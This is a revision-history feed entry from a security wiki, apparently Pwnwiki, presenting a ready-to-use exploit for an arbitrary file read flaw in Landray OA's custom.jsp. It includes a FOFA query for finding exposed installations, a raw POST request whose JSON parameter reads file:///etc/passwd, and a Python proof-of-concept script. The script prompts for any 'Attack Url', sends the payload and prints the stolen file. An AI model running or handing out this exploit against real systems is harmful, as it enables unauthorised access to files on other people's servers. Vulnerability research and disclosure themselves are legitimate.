https://pwnwiki.com/index.php?action=history&feed=atom&title=%E8%97%8D%E5%87%8COA_custom.jsp_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E
藍凌OA custom.jsp 任意文件讀取漏洞 - Revision history
2026-04-13T21:12:12Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E8%97%8D%E5%87%8COA_custom.jsp_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E&diff=1967&oldid=prev
Pwnwiki: Created page with "==FOFA== <pre> app="Landray-OA系统" </pre> ==漏洞利用== 出現漏洞的文件為 custom.jsp, 請求包如下: <pre> POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Ho..."
2021-05-01T01:20:22Z
<p>Created page with "==FOFA== <pre> app="Landray-OA系统" </pre> ==漏洞利用== 出現漏洞的文件為 custom.jsp, 請求包如下: <pre> POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Ho..."</p>
<p><b>New page</b></p><div>==FOFA==<br />
<pre><br />
app="Landray-OA系统"<br />
</pre><br />
<br />
==漏洞利用==<br />
出現漏洞的文件為 custom.jsp, 請求包如下:<br />
<pre><br />
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1<br />
Host:<br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15<br />
Content-Length: 42<br />
Content-Type: application/x-www-form-urlencoded<br />
Accept-Encoding: gzip<br />
<br />
var={"body":{"file":"file:///etc/passwd"}}<br />
</pre><br />
<br />
<br />
==POC==<br />
<pre><br />
<br />
#!/usr/bin/python3<br />
#-*- coding:utf-8 -*-<br />
# author : PeiQi<br />
# from : http://wiki.peiqi.tech<br />
<br />
import base64<br />
import requests<br />
import random<br />
import re<br />
import json<br />
import sys<br />
<br />
def title():<br />
print('+------------------------------------------')<br />
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br />
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br />
print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br />
print('+ \033[34mVersion: 蓝凌OA 任意文件读取 \033[0m')<br />
print('+ \033[36m使用格式: python3 poc.py \033[0m')<br />
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')<br />
print('+------------------------------------------')<br />
<br />
def POC_1(target_url):<br />
vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",<br />
"Content-Type": "application/x-www-form-urlencoded"<br />
}<br />
data = 'var={"body":{"file":"file:///etc/passwd"}}'<br />
try:<br />
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)<br />
print("\033[36m[o] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url))<br />
if "root:" in response.text and response.status_code == 200:<br />
print("\033[36m[o] 成功读取 /etc/passwd \n[o] 响应为:{} \033[0m".format(response.text))<br />
<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败:{} \033[0m".format(e))<br />
sys.exit(0)<br />
<br />
#<br />
if __name__ == '__main__':<br />
title()<br />
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))<br />
POC_1(target_url)<br />
</pre><br />
<br />
==參考==<br />
https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw</div>
Pwnwiki